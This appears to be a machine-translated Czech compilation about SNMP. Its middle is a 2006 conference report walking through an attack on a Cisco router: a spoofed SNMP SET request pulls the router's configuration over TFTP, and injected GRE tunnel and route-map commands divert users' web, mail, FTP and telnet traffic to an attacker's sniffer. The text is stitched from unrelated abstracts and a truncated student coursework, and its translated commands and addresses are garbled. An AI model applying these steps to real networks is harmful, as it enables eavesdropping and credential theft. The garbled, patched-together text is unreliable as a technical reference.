SNMP je aplikační protokol určený pro zásobník TCP / IP, i když existují implementace pro jiné zásobníky, například IPX / SPX. Protokol SNMP se používá k načtení stavu, výkonu a dalších charakteristik ze síťových zařízení, která jsou uložena v Management Information Base (MIB). Jednoduchost protokolu SNMP je do značné míry dána jednoduchostí SNMP MIB, zejména jejich raných verzí MIB I a MIB II. Samotný protokol SNMP je navíc také poměrně nekomplikovaný.
Agent SNMP je prvek zpracování, který poskytuje správcům umístěným na řídicích stanicích sítě přístup k hodnotám proměnných MIB a tím jim umožňuje implementovat funkce pro správu a monitorování zařízení.
Hlavní operace správy se přenášejí na správce a agent SNMP nejčastěji plní pasivní roli a na jeho žádost přenáší hodnoty nahromaděných statistických proměnných manažerovi. V tomto případě zařízení pracuje s minimálními náklady na údržbu řídicího protokolu. Využívá téměř veškerý svůj výpočetní výkon k provádění svých základních funkcí jako routeru, mostu nebo rozbočovače a agent shromažďuje statistiky a hodnoty proměnných stavu zařízení a předává je správci systému správy.
SNMP - toto je protokol jako Vyžádat odpověď, to znamená, že na každý požadavek od manažera musí agent poslat odpověď. Zvláštností protokolu je jeho extrémní jednoduchost - obsahuje pouze několik příkazů.
Příkaz Get-request používá správce k získání hodnoty objektu od agenta podle jeho názvu.
Příkaz GetNext-request používá správce k načtení hodnoty dalšího objektu (bez zadání jeho názvu) při postupném skenování tabulky objektů.
Agent SNMP používá příkaz Get-response k odeslání odpovědi na příkazy Get-request nebo GetNext-request do manažera.
Příkaz Nastavit používá správce ke změně hodnoty objektu. Příkaz Nastavit skutečně ovládá zařízení. Agent musí pochopit význam hodnot objektu, který se používá ke správě zařízení, a na základě těchto hodnot provést skutečnou kontrolní akci - deaktivovat port, přiřadit port konkrétní VLAN atd. Příkaz Nastavit je také vhodné pro nastavení podmínek, za kterých by měl agent SNMP odeslat odpovídající zprávu správci. Lze definovat reakce na události, jako je inicializace agenta, restart agenta, propojení dolů, obnovení spojení, neplatné ověřování a ztráta nejbližšího routeru. Pokud dojde k některé z těchto událostí, agent zahájí přerušení.
Příkaz Trap používá agent k hlášení výjimky správci.
SNMP v.2 přidává do této sady příkaz GetBulk, který umožňuje správci načíst více hodnot proměnných v jednom požadavku.
Informační bezpečnost - 2006
Zpráva
SNMP je vhodný protokol
nebo ohrožení podnikové sítě
- PozadíSNMP
Simple Network Management Protocol (SNMP) poskytuje metody pro správu síťových prostředků.
Historie protokolu SNMP (Simple Network Management Protocol) začíná jeho předchůdcem SGMP (Simple Gateway Monitoring Protocol), který byl definován v RFC 1028 v roce 1987. SGMP byl vyvinut jako dočasné řešení pro správu sítě.
Standard SGMP definoval základní konstrukční model používaný v SNMP, popisující protokol SGMP pouze z hlediska hledání a / nebo úpravy proměnných uložených na routeru-e. Tento standard také vyniká malým počtem operací, které jsou dodnes základem operací SNMP.
První verze rámce SNMP, SNMPv1, byla definována v RFC 1067 (později revidovaná v RFC 1098 a 1157) v roce 1993.
Nová specifikace SNMPv2 byla vydána v roce 1996 a obsahovala vylepšení, jako je blokovací mechanismus, 64bitové čítače a vylepšené chybové zprávy.
Nejnovějším přírůstkem protokolu je SNMPv3, který byl definován v roce 1999. V zásadě se jedná o stejný SNMPv2, ale s úpravami z hlediska zabezpečení, jako jsou: Model zabezpečení (model zabezpečení) a Model řízení přístupu (model řízení přístupu).
- Efektivní kontrola nad sítí
Protokol SNMP lze použít ke správě jakéhokoli systému připojeného k internetu
Náklady na implementaci SNMP jsou minimální
Definováním nových „spravovaných objektů“ (MIB) lze snadno rozšířit možnosti správy
SNMP je docela robustní; i v případě odmítnutí práce může manažer pokračovat v práci (i když může být zapotřebí trochu většího úsilí)
V současné době výrobci komunikačních zařízení standardně povolují protokol SNMP. Tento protokol se stal nejdůležitějším standardem pro správu sítě.
- Je to takSNMPto je hrozba?
V závislosti na verzi standardu SNMP a správné konfiguraci zařízení lze tento protokol použít v mnoha oblastech hackingu, od drobného chuligánství až po efektivní průmyslovou špionáž.
Správci systému mají často nejasné znalosti SNMP. Kvůli vágnímu pochopení účelu tohoto protokolu, a tedy neznalosti potenciálních problémů, jsou problémy s jeho bezpečností často přehlíženy.
Skutečnost, že SNMP je založen na UDP, je o to zajímavější. Jako protokol bez připojení je UDP zranitelný vůči útokům spoofingu IP. Pokud má vaše organizace zařízení Cisco, jste připraveni prozkoumat, co s ní můžete dělat pomocí protokolu SNMP.
Scénář útoku 1.
Toto je aktuální konfigurace routeru Victim Router:
Aktuální konfigurace: 1206 bajtů
povolit tajemství 5 $ 1 $ h2iz $ DHYpcqURF0APD2aDuA. YX0
rozhraní Ethernet
rozhraní Ethernet0 / 1
IP adresa 192.168.0
síť 192.168.1.0
ip nat uvnitř seznamu zdrojů 102 rozhraní Ethernet 0/0 přetížení
žádný ip http server
seznam přístupových práv 1 192.168.
seznam přístupů 102 povolit ip jakýkoli
komunita snmp-server veřejné veřejné RO
soukromá komunita snmp-server RW 1
snmp-server povolit pasti tty
synchronní protokolování
Věnujte pozornost pravidlu přístupu pro skupinu RW. Toto pravidlo se pokouší omezit přístup SNMP pro čtení / zápis pouze na uživatele v místní síti (192.168.1.0).
Existují dvě hlavní fáze útoku:
Obejití pravidel přístupu SNMP na napadeném routeru za účelem získání přístupu ke konfiguračnímu souboru routeru. Vytvoření GRE tunelu mezi napadeným routerem a routerem hackera pro vzdálené zachycení provozu napadeného klientského počítače (Victim Client).
Teorie
Pomocí příkazu SNMP SET můžete vynutit směrovač Cisco přepsat / odeslat jeho konfigurační soubor pomocí TFTP.
Odesláním požadavku SNMP SET s falešnou IP adresou (z rozsahu popsaného v RFC10) musíme přinutit napadený router, aby nám poslal jeho konfigurační soubor. To předpokládá, že známe „řetězec soukromé komunity“ a seznam ACL popsaný v konfiguračním řádku skupiny RW.
Obcházení pravidel přístupu SNMP
Začněme vytvořením falešného požadavku SNMP. Pomocí malého Perl skriptu a Ethereal zachytíme standardní požadavek SNMP SET „copy config“, který použijeme jako základní balíček.
[chráněno e-mailem]# ./copy-router-config. pl
######################################################
# Zkopírujte konfiguraci směrovače Cisco - pomocí protokolu SNMP
# Hacked up by muts - ***** @ *** co. il
#######################################################
Použití: ./cisco-copy-config. pl
Ujistěte se, že je nastaven server TFTP, nejlépe spuštěný z / tmp!
Po provedení skriptu bude paket SNMP zachycen. Podle očekávání byl tento požadavek routerem odmítnut a nebyl odeslán žádný konfigurační soubor.
Věnujte pozornost IP adrese útočníka (80.179.76.227). Nyní pomocí hexadecimálního editoru změníme tuto IP adresu a některá další pole v záhlaví paketu. V hexadecimálním zápisu vypadá spoofed IP adresa 192.168.1.5 jako C0 A8
Pak pošleme paket pomocí file2cable (nebo jiného generátoru paketů).
Paket obchází pravidla přístupu SNMP a konfigurační soubor napadeného routeru získáme přes TFTP.
GRE tunel
GRE (Generic Routing Encapsulation) je tunelovací protokol určený k zapouzdření libovolných typů paketů síťové vrstvy v rámci paketu síťové vrstvy. Jedním z případů použití pro GRE je připojení segmentů sítě IPX přes odkaz, který podporuje pouze síťovou vrstvu modelu OSI. V takovém případě budete muset vytvořit GRE tunel z jednoho routeru do druhého, abyste mohli posílat pakety IPX tam a zpět přes kanál pouze pro IP.
Budeme však GRE používat k jiným než obvyklým účelům. Náš plán je následující:
- Vytvořte GRE tunel z napadeného routeru do routeru hackera. Určete, jaký provoz bude procházet tunelem. Rozbalte GRE pakety přicházející z napadeného routeru a předejte je k analýze útočníkovi do počítače (sniffer).
Napadený router
Musíme na napadeném routeru vytvořit GRE tunel. Protože nemáme přístup k terminálu (konzole), můžeme jednoduše upravit přijatý konfigurační soubor a poté jej odeslat zpět na router pomocí falešného požadavku SNMP SET. Do konfiguračního souboru napadeného routeru přidejte následující řádky:
tunel rozhraní0
IP adresa 192.168.10
tunel zdroj Ethernet
cíl tunelu
režim tunelu gre ip
Mají na mysli následující:
- Vytvořili jsme rozhraní tunelu0 a zadali jsme IP adresu ze sítě 192.168.10.x. Pro výměnu dat musí být oba konce tunelu ve stejné podsíti. Uvedli jsme, že rozhraní Ethernet0 / 0 je začátek tunelu (jinak, odkud by mohl začít tunel?). Konec tunelu je IP adresa externího rozhraní směrovače hackera. Poslední příkaz je volitelný, protože ve výchozím nastavení je to stejně vytvořený tunel GRE (ale přidali jsme ho pro větší jistotu).
Nyní můžeme nakonfigurovat přístupové seznamy a určit typ provozu procházejícího tunelem a mapy tras potřebné k přesměrování provozu.
Chcete-li to provést, přidejte do konfiguračního souboru napadeného směrovače několik dalších řádků:
seznam přístupů 101 povolí tcp libovolný eq 443
seznam přístupů 101 povoluje tcp libovolný eq 80
access-list 101 povolit tcp jakýkoli eq 21
access-list 101 povolit tcp jakýkoli eq 20
access-list 101 povolit tcp libovolný ekv. 23
seznam přístupů 101 povolí tcp libovolný ekv. 25
seznam přístupových práv 101 umožňuje tcp libovolný eq 110
Povolili jsme přenos dat přes protokoly SSL, HTTP, FTP, telnet, SMTP a POP3.
Nyní, pokud přenos odpovídá výše popsaným pravidlům, bude přesměrován podle směrovacích map, jejichž popis je třeba přidat do konfiguračního souboru:
směrovací provoz směrovací mapy
odpovídat IP adrese 101
nastavit ip next-hop 192.168.10.2
rozhraní Ethernet
IP politika Route-Map odklonit-provoz
- Vytvořili jsme pravidlo přístupu, které umožňuje všechny typy provozu. Vytvořili jsme směrovací mapu přesměrování na čichače (tato mapa směrování přesměruje tunelovaný provoz na čichače). Vytvořené pravidlo přístupu se použije jako podmínka shody. Jako adresu dalšího skoku jsme zadali IP adresu útočníka (čichače). Na rozhraní tunelu0 jsme aplikovali směrovací mapu.
Je velmi důležité, abychom k směrování dat použili mapu směrování. Směrovač přijímá tunelovaná data zapouzdřená v paketu GRE a bez dekódování paketu je nemůžeme zobrazit. Předáním přijatých paketů útočníkovi (snifferovi) je router předá jako normální IP pakety bez zapouzdření GRE.
Nakonec vytvořme směrovací mapu a přidružíme ji k rozhraní Ethernet0 / 0:
Attacker (config-if) # route-map divert-out
Attacker (config-route-map) # match ip address 101
Attacker (config-route-map) # set ip next-hop 192.168.10.1
Útočník (config-route-map) # exit
Útočník (konfigurace) # rozhraní ethernet0 / 0
Attacker (config-if) # ip policy route-map divert-out
Tato další nastavení znamenají následující:
- Poté, co útočník (sniffer) zachytí a předá tunelovaná data zpět, mapa směrování odklonění přesměruje provoz zpět na napadený router. Aplikovali jsme směrovací mapu na ethernetové rozhraní.
Zahajujeme útok
Po dokončení všech nastavení musíme pouze nahrát nový upravený konfigurační soubor na napadený router. Výsledkem bude aktivace GRE tunelu a přesměrování veškerého provozu z lokální sítě napadeného počítače na hackera (sniffera).
Funkčnost tunelu můžete zkontrolovat odesláním ladicího příkazu na router útočníka:
Útočník # ladění tunelu
-> 212.199.145.242, tos = 0x0
* 3. března 06:38: Tunnel0: GRE / IP ke klasifikaci 212.199.145.242
-> 80.179.20.55 (len = 108 typ = 0x800 ttl = 253 tos = 0x0)
* 3. března 06:38: Tunnel0: oprava sousedství, 80.179.20.55
-> 212.199.145.242, tos = 0x0g vše
V důsledku těchto akcí obdrží Ethereal na počítači útočníka následující balíčky:
https://pandia.ru/text/78/194/images/image006_20.jpg "width =" 624 "height =" 468 ">
Po několika hodinách obdržíme naskenovaná data:
Přijatá data obsahují následující typ informací:
- SysName - můžete zjistit adresu, telefonní číslo předplatitele
- IP adresa agenta -
- DNS -
- Doba odezvy -
- Prodejce -
- SystémPopis - lze použít jako další užitečné informace při útocích
- Komunita -snmp-komunita, se kterou jsme extrahovali informace
- Místo - můžete zjistit adresu, telefonní číslo účastníka
- Kontakt - můžete zjistit jméno, přezdívku správce
- Čas posledního spuštění -
- Rozhraní - čím více, tím zajímavější
- Stav objevu -
Z přijatých dat používáme IP adresy a program Real-time Network Monitor, abychom zjistili, jaké užitečné informace lze získat s dalšími požadavky SNMP.
Je také docela možné získat úplný přístup k zařízení jednoduše změnou názvu komunity snmp z veřejného na soukromý. Máme tedy příležitost posílat různé příkazy snmp.
Výsledek útoku:
Po tomto experimentu jsme zjistili, že:
Nepoužívá se ani nejjednodušší metoda zabezpečení - seznamy přístupů
Můžete snadno zjistit počet klientů poskytovatele
Důvěrné informace o klientech poskytovatele
Ekonomický potenciál poskytovatele
Užitečné informace, které lze použít při různých útocích
- je snadné sbírat statistiky poskytovatele a jeho korporátních klientů s dalším využitím pro určité účely
- Lze útoku zabránit? Metody ochrany
Někdy některé věci nejsou takové, jaké se zdají. Při práci s protokolem SNMP (nebo jinými protokoly založenými na UDP) si vždy musíte být vědomi zákoutí, které by při vynechání mohly ohrozit vaši síť.
Metody ochrany jsou extrémně jednoduché. Zcela závisí na správcích sítě:
Nenechávejte výchozí nastavení hardwaru (ve výchozím nastavení)
Promyslete si schéma správného používání protokolu
Definujte komplexní názvy snmp-community
Použijte seznamy přístupů
V přístupových seznamech zadejte jednotlivé adresy IP, nikoli rozsahy IP (rozsahy IP)
- Závěr
Cílem práce bylo ukázat ani ne tak účinnost popsaného útoku, ale spíše potenciální nedostatky protokolů založených na UDP. To v žádném případě neznamená, že hardware Cisco / ZyXel je nezabezpečený. Kompetentní konfigurace by měla minimalizovat šance na únik zabezpečení. Chyby správců sítě jsou hlavními důvody pro narušení síťového vybavení.
ÚVOD 3
1. TEORETICKÉ ODŮVODNĚNÍ PROBLÉMU STUDIJNÍCH METOD ÚTOKŮ NA PROTOKOLU SNMP
1.1 POTŘEBA UČIT SE SNMP 5 ÚTOKOVÝCH TECHNIK
1.2 PROTOKOL SNMP: POPIS, ÚČEL 7
2. ANALÝZA ÚTOKŮ SNMP A METODY SPOLUPRÁCE
2.1 TECHNIKY A ZPŮSOBY ZABRÁNĚNÍ SNMP ÚTOKU 11
2.2 ZPŮSOBY POČÍTÁNÍ ÚTOKŮ NA PROTOKOLU SNMP 15
ZÁVĚR 20
SEZNAM POUŽITÝCH ZDROJŮ 21
Výňatek z textu
Otázky budování systému ochrany před útoky na protokol SNMP byly diskutovány mnoha autory, ale neexistuje shoda ohledně vhodnosti použití SNMP kvůli složitosti zajištění bezpečnosti. Zdůvodněte potřebu studovat metody útoků na protokol SNMP a způsoby, jak jim předcházet. Předmětem výzkumu jsou metody síťových útoků na protokol SNMP a způsoby jejich prevence.
Síťové plánování se zpravidla používá při sestavování strategických plánů a dlouhodobých komplexů různých typů podnikových činností (konstrukční, plánovací, organizační atd.). Hlavním plánovacím dokumentem v tomto systému je plán sítě nebo jednoduše síť který představuje informační dynamický model, který odráží všechny logické vztahy a výsledky provedené práce nezbytné k dosažení konečného cíle strategického plánování. Metody síťového modelování odkazují na metody pro optimální rozhodování, které odůvodňují zohlednění tohoto typu modelu v této práci.
Pokud se aktivita uživatele nijak neshoduje se stanovenými pravidly, pak detekční zařízení identifikuje potenciální útoky. Většina systémů pro detekci zneužití a anomálií je založena na Denningově modelu.
DoS-attack (z anglického Denial of Service, denial of service) - útok na výpočetní systém za účelem jeho deaktivace, to znamená vytvoření podmínek, za kterých legitimní (legitimní) uživatelé systému nemají přístup k poskytnutým zdrojům systémem, nebo je tento přístup obtížný. Odmítnutí „nepřátelského“ systému může být buď samo o sobě cílem (například znepřístupněním oblíbené stránky), nebo jedním z kroků k zvládnutí systému (pokud software v nouzové situaci vydá jakékoli kritické informace - například verze, část programového kódu atd.).
V lednu 2007 vstoupil v platnost federální zákon „O osobních údajích“ č. 152-FZ, který upravuje vztahy související se zpracováním osobních údajů (dále jen PD) a stanoví požadavky na ochranu těchto údajů.
závěrečná kvalifikační práce (dále jen „FQP“) je zaměřena na ochranu podnikové sítě v podniku LLC SCSO Naděžda před neoprávněným přístupem na základě certifikovaného softwarového a hardwarového produktu, který splňuje požadavky regulačních orgánů FSTEC a FSB v oblasti informační bezpečnosti . Protože v současnosti podniková síť tohoto podniku nesplňuje požadavky federálního zákona č.
Dne 2. ledna 2007 se vedení dotyčné společnosti rozhodlo uspořádat ochranu informačního systému v souladu s přijatými legislativními požadavky.
Organizace, které před připojením k internetu neměly problémy s bezpečností informací, se často ocitly zcela nepřipravené na změněnou situaci. Jedním z řešení bezpečnostních problémů s připojením k internetu je použití bran firewall (brány firewall, brány firewall).
Brána firewall je softwarový a hardwarový systém umístěný ve spojovacím bodu vnitřní sítě organizace a internetu a kontrolující přenos dat mezi sítěmi. Přítomnost bran firewall však již nezaručuje bezpečnost dat, protože se objevily techniky hackování těchto systémů.
Každý manažer musí pochopit důležitost ochrany podnikové sítě před neoprávněným vniknutím. Všechny společnosti komunikují s jinými lokálními sítěmi pomocí globální sítě - internetu, a to z toho důvodu, že vytváření samostatných komunikačních kanálů je velmi pracný a nákladný proces, který si mohou dovolit pouze ty největší organizace. V tomto ohledu může být průlom v ochraně sítě proveden nejen vlastními zaměstnanci organizace, ale také z vnějšího prostředí, organizacemi konkurentů a jednotlivců.
Praktický význam práce spočívá v možnosti rozšířeného využití vzdělávacího komplexu pro školení pracovníků v oblasti síťových technologií a ochrany informací.
Praktický význam práce spočívá ve vývoji programu pro monitorování otevřených portů, jehož použití umožní monitorování a řízení potenciálního přístupu k různým aplikacím operačního systému.
V rámci studie byla literatura použita ve dvou hlavních směrech. Nejprve jsou základní principy a obecná metodika pro budování informačních bezpečnostních systémů uvedeny v dílech V.V. Gafner, T.V. Ershova, Yu. Khokhlova, S.B. Shaposhnik, V.P. Melnikov, S.A.Kleimenova, A.M. Petrakov, S.T. Papaeva, I.V. Babaytsev a N.V. Kozak a další. Zadruhé, kritéria pro systémy ochrany informací, zejména osobní údaje atd., Jsou uvedena v pracích N.I. Petrykina, V.A. Semenenko, A.F. Chipigi, V.F. Shangin a další. Ve vědeckých pracích I.V. je současně zdůrazněn obrovský potenciál a nedostatek vědeckého vývoje ve studovaném oboru. Mashkina, K.A. Shapchenko, Yu.M. Shubina, D.A. Shchelkunova a další Obsah označených a dalších prací použitých v této studii označuje mnohostrannou, ale nedostatečně studovanou oblast systémové ochrany informací v předškolní vzdělávací instituci.
Kromě integrovaných mechanismů operačního systému lze při vývoji aplikací použít různé techniky k ochraně před hackerstvím a dopadem na programový kód, například zamlžování nebo šifrování kódu pomocí debuggerů a packerů.
Svět prochází obdobím kvalitativních změn v terorismu. Z individuálního (například terorismu sociálních revolucionářů v posledním období existence Ruské říše) se terorismus transformoval na masový: hlavním předmětem teroru nebyla jen vládnoucí elita, ale celá společnost; Hlavním prostředkem zastrašování nebyla vražda konkrétních lidí, ale neurčitý, co nejširší okruh lidí. Proto se dnes terorismus týká všech: například každý může být během výbuchu v metru nebo v obchodě. Proto je téma této práce nepochybně relevantní.
SEZNAM POUŽITÝCH ZDROJŮ
Předpisy
1. Federální zákon Ruské federace ze dne
Seznam odborné a vědecké literatury
2. Blank-Edelman D. Perl pro správu systému, M.: Symbol-Plus, 2009. - 478 s.
3. Borodakiy V.Yu. Praxe a vyhlídky na vytváření zabezpečeného informačního a výpočetního cloudu na základě MSS OGV / V.Yu. Borodakiy, A. Yu. Dobrodeev, P.A. Nashchekin // Aktuální problémy vývoje technologických systémů ochrany státu, speciální komunikace a speciální informační podpory: VIII Všeruská mezirezortní vědecká konference: materiály a zprávy (Orel, 13. – 14. Února 2013).
- V 10 hodin, část 4 / Pod obecným vyd. V.V. Mizerova. - Oryol: Akademie FSO Ruska, 2013.
4. Grishina NV Organizace komplexního systému zabezpečení informací. - M.: Helios ARV, 2009 .-- 256 s.,
5. Douglas R. Mauro SNMP Basics, 2. vydání / Douglas R. Mauro, Kevin J. Schmidt - M .: Symbol-Plus, 2012.-725s.
6. Kulgin M.V. Počítačové sítě. Stavební praxe. Pro profesionály, SPb.: Peter, 2003.-462s.
7. Mulyukha V.A. Metody a prostředky ochrany počítačových informací. Firewalling: Textbook / Mulyukha V.A., Novopashenny A.G., Podgursky Yu.E. - SPb.: Publishing house SPbSPU, 2010. - 91 s.
8. Olifer V. G., Olifer N. P. Počítačové sítě. Principy, technologie, protokoly. - 4. místo. - SPb: Peter, 2010 .-- 902s.
9. Technologie přepínání a směrování v lokálních počítačových sítích: tutoriál / SmirnovaE. V. a další; vyd. A.V. Proletarsky. - M.: Vydavatelství MSTU im. NE Bauman, 2013. - 389 s.
10. Flenov M. Linux očima hackera, Petrohrad: BHV-Petrohrad, 2005. - 544 s.
11. Khoreev P.V. Metody a prostředky ochrany informací v počítačových systémech. - M.: Publishing Center "Academy", 2005. - 205 s.
12. Khoroshko V. A., Chekatkov A. A. Metody a prostředky ochrany informací, Kyjev: Junior, 2003. - 504s.
Internetové zdroje
13. IDS / IPS - systémy detekce a prevence narušení [elektronický zdroj]
14. Analýza internetových hrozeb v roce 2014. DDoS útoky. Hackování webových stránek. [Elektronický zdroj].
15. Kolischak A. Zranitelnost řádku formátu [Elektronický zdroj].
16. První míle, č. 04, 2013 [Elektronický zdroj].
Popis práce
Obzvláště akutní je otázka spolehlivosti a maximální efektivity fungování počítačových sítí. Banky, finanční společnosti, dopravní společnosti a telekomunikační společnosti trpí obrovskými ztrátami kvůli problémům se sítí, které vedou ke ztrátě dat, dramatickému poklesu výkonu, zablokování serverů a dalším problémům. V důsledku toho se stává obzvláště aktuální problém správy sítě.
Správa sítě je soubor opatření a opatření zaměřených na zvýšení efektivity sítě, detekci a eliminaci poruch jejího provozu, její správný vývoj a modernizaci a v konečném důsledku snížení nákladů.
ÚVOD ………………………………………………………………… ..3
1.2 Logika provozu protokolu SNMP …………………………………… ..…. .12
2.1 Zabezpečení SNMP (nebo verze SNMP) ……… .21
2.2 Zásady konfigurace protokolu SNMP …………………………………………………………………………………………………………………… …………………………………………………… 23
ZÁVĚR ………………………………………………………… ..... 26
REFERENCE …………………… .. ………………………… ...… 27
Soubory: 1 soubor
Ministerstvo školství a vědy Ruské federace
FSBEI HPE "Čeljabinská státní univerzita"
Ústav informačních technologií
Katedra informačních technologií
KURZNÍ PRÁCE
Protokol SNMP. Metody síťových útoků a ochrany
Vyplnil student
Galiullina Oksana Kuntuarovna
Fakulta IIT, skupina BIS-201
Vědecký poradce:
Kosenko Maxim Jurjevič
Přednášející katedry
informační technologie
Datum dokončení: _______________
Datum obrany: _____________
Hodnocení: __________________
Čeljabinsk
ÚVOD ………………………………………………………………… ..3
KAPITOLA I. DEFINICE SNMP ………… ... ……………………………… 5
1.1 Architektura protokolu SNMP …………………………………………… .6
1.2 Logika provozu protokolu SNMP …………………………………… ..…. .12
KAPITOLA II. MIB ………………………………………………………………… .16
KAPITOLA III. KONFIGURACE BEZPEČNOSTI A SNMP …………… .. …… .21
2.1 Zabezpečení SNMP (nebo verze SNMP) ……… .21
2.2 Principy konfigurace protokolu SNMP ………………………………………………………………… 23
ZÁVĚR ……………………………………………………………… 26
REFERENCE …………………… .. ………………………… ...… 27
ÚVOD
Činnost moderních organizací úzce souvisí s využíváním informačních technologií, ať už se jedná o počítač na pracovišti manažera malé firmy nebo podnikovou síť velké společnosti - systémového integrátora. A čím větší je organizace a čím důležitější jsou její funkce, tím vyšší jsou požadavky na počítačové systémy, které zajišťují výkon těchto funkcí, a tím dražší jsou náklady na každé selhání v práci. Efektivita společnosti stále více závisí na kvalitě jejího počítačového a telekomunikačního vybavení.
Obzvláště akutní je otázka spolehlivosti a maximální efektivity fungování počítačových sítí. Banky, finanční společnosti, dopravní společnosti a telekomunikační společnosti trpí obrovskými ztrátami kvůli problémům se sítí, které vedou ke ztrátě dat, dramatickému poklesu výkonu, zablokování serverů a dalším problémům. V důsledku toho se stává obzvláště aktuální problém správy sítě.
Správa sítě je soubor opatření a opatření zaměřených na zlepšení efektivity sítě, detekci a eliminaci poruch jejího provozu, její správný vývoj a modernizaci a v konečném důsledku snížení nákladů.
V současné době jsou aplikace pro správu sítě založeny na platformách pro správu sítě, jako jsou systémy HP OpenView od společnosti Hewlett-Packard, NetView pro AIX (IBM), SunNet Manager (Sun), Spectrum (Cabletron Systems), NetWare Management Systems (Novell) a různé další ovládací prvky pro různé platformy.
Tyto nástroje jsou založeny na použití protokolu SNMP (Simple Network Management Protocol). Protokol SNMP je navržen ke shromažďování a přenosu informací o stavu mezi různými počítači.
KAPITOLA I. DEFINICE SNMP
SNMP je protokol z rodiny TCP / IP (SNMP je popsán v RFC 1157). Původně byl vyvinut internetovou komunitou za účelem sledování a odstraňování problémů se směrovači a mosty. SNMP umožňuje sledování a přenos stavových informací:
- počítače se systémem Windows NT;
- Servery LAN Manager;
- směrovače a brány;
- minipočítače nebo sálové počítače;
- terminálové servery;
- náboje.
SNMP používá distribuovanou architekturu řídících systémů a agentů. Pomocí služby Microsoft SNMP může počítač se systémem Windows NT hlásit svůj stav systému správy SNMP v síti TCP / IP.
Služba SNMP odesílá informace o stavu do jednoho nebo více počítačů na vyžádání nebo při výskytu důležité události, například v počítači, kde dochází místo na pevném disku.
1.1 Architektura protokolu SNMP
Síť založená na SNMP má tři hlavní komponenty pro správu:
- SNMP manager - software nainstalovaný na PC administrátora (monitorovací systém)
- SNMP agent - software běžící na síťovém uzlu, který je monitorován.
- SNMP MIB - MIB znamená Management information base. Tato součást systému zajišťuje strukturu dat vyměňovaných mezi agenty a manažery. Ve skutečnosti je to druh databáze ve formě textových souborů.
Správce SNMP a agent SNMP
Abychom pochopili účel komponent, můžeme říci, že SNMP manager je vrstva (rozhraní) mezi operátorem - administrátorem a síťovým uzlem, na kterém běží agent SNMP. Můžeme také říci, že agent SNMP je rozhraní mezi správcem SNMP a hardwarem v síťovém uzlu. Pokud nakreslíme analogii mezi protokolem SNMP a architekturou klient-server (například webový server), pak webový server funguje jako služba na určitém portu a uživatel používá prohlížeč pro přístup k webovému serveru jako klient. Jedná se o dobře definovanou architekturu s výrazným klientem a serverem. V případě SNMP jsou role klienta a serveru poněkud rozmazané. Například agent SNMP je druh služby běžící na zařízení (které je monitorováno) a zpracovává požadavky na konkrétním portu udp / 161, tj. Je to vlastně server. A správce SNMP je druh klienta, který adresuje SNMP server agentovi. V SNMP existuje tzv. Past. Toto je požadavek agenta na manažera. Přesněji ani požadavek, ale oznámení. Když je toto oznámení odesláno, agent a manažer „přepnou role“. To znamená, že správcem v tomto případě musí být server běžící na portu udp / 162 a agentem je klient. V posledních verzích lze SNMP trap označovat jako oznámení.
SNMP pracuje na vrstvě 7 modelu OSI, to znamená, že se jedná o službu aplikační vrstvy. Interakce mezi agentem a manažerem na úrovni protokolu SNMP je organizována pomocí tzv. Pakety objektů PDU (Protocol Data Unit), které jsou zapouzdřeny v transportním protokolu. Ačkoli SNMP podporuje různé typy přenosu, v 99% případů se používá UDP. Kromě toho každá zpráva PDU obsahuje konkrétní příkaz (pro čtení proměnné, zápis hodnoty proměnné nebo odpověď trapu od agenta). Interakci uzlů prostřednictvím SNMP lze obecně reprezentovat následující posloupností: manager-> SNMP (PDU) -UDP-IP- Ethernet-IP-UDP-SNMP (PDU) -> agent.
Pokud používáte šifrování v SNMP, výchozí port pro požadavky / odpovědi je udp / 10161 a depeše se odesílají na udp / 10162.
Hostitelští agenti shromažďují informace o zařízení a zapisují shromážděné čítače na hodnoty proměnných v MIB. Tedy zpřístupnění manažerům.
Obr. 1. Schéma interakce SNMP-agent - SNMP-manager
Správce SNMP odesílá požadavky agentovi na portu udp / 161 (pokud v agentovi není nakonfigurován žádný jiný port) z libovolného portu z pomíjivého rozsahu. Požadavek správce SNMP určuje port a zdrojovou adresu. Agent pak paket přijme a zpracuje (pokud jsou splněny níže popsané podmínky). V průběhu zpracování je generována odpověď, která je odeslána na port převzatý z původního požadavku. Odpověď se odesílá z portu udp / 161. Můžeme říci, že agent SNMP tak poskytuje správci SNMP přístup k datům uloženým v MIB. Současně v době odeslání vloží správce SNMP do PDU určité ID (RequestID) a agent v odpovědi PDU vloží toto ID beze změny, aby správce nezaměňoval pakety od různých agentů. Agenta SNMP lze nakonfigurovat tak, aby odesílal upozornění na depeše, která provádí z dočasného portu na port udp / 162 správce SNMP.
SNMP PDU (nebo zprávy protokolu SNMP)
Nahoře jsem zmínil jednotku výměny mezi uzly SNMP - PDU (Protocol Data Unit), podívejme se na tento koncept. Pro výměnu mezi agentem a správcem se používá specifická sada zpráv příkazových PDU:
- Trap - jednosměrné oznámení od agenta SNMP -> správce o jakékoli události.
- GetReponse - odpověď agenta správci, vrácení požadovaných hodnot proměnných.
- GetRequest - požadavek na agenta od manažera, který se používá k získání hodnoty jedné nebo několika proměnných.
- GetNextRequest - požadavek na agenta od manažera, který se používá k získání další hodnoty proměnné v hierarchii.
- SetRequest - žádost agenta o nastavení hodnoty jedné nebo více proměnných.
- GetBulkRequest - požadavek na agenta, aby obdržel pole dat (vyladěno GetNextRequest). (Tento PDU byl představen v SNMPv2.)
- InformRequest je jednosměrné oznámení mezi manažery. Lze jej použít například k výměně informací o MIB (mapování znaků OID na digitální). V reakci na to manažer vygeneruje podobný paket, aby potvrdil, že byla přijata počáteční data. (Tento PDU byl představen v SNMPv2.)
Jak vidíte, v závislosti na verzi protokolu je sada příkazů odlišná (například InformRequest a GetB ulkRequest se plně objevily až ve druhé verzi SNMP).
Struktura PDU
Není nutné se dívat na strukturu PDU, ale pomůže vám to lépe porozumět logice SNMP. Všechny PDU (kromě Trap) se skládají ze specifické sady polí, do kterých se zaznamenávají potřebné informace:
Obr. 2. Formát pěti SNMP zpráv zapouzdřených v datagramu UDP
Co tato pole znamenají:
- Verze - obsahuje verzi SNMP;
- Heslo (komunita) - obsahuje posloupnost znaků popisujících členství ve skupině;
- Typ PDU má identifikátor digitálního požadavku (Get, GetNext, Set, Responde, Trap ...);
- Identifikátor požadavku je stejná sada znaků, která spojuje požadavek / odpověď do jednoho celku;
- Stav chyby je číslo, které charakterizuje povahu chyby:
- Pro požadavky (Get, Set, GetNExt atd.) - 0
- Odpovědi:
- 0 (NoError) - Žádné chyby;
- 1 (TooBig) - Objekt se nevejde do jedné zprávy odpovědi;
- 2 (NoSuchName) - neexistující proměnná;
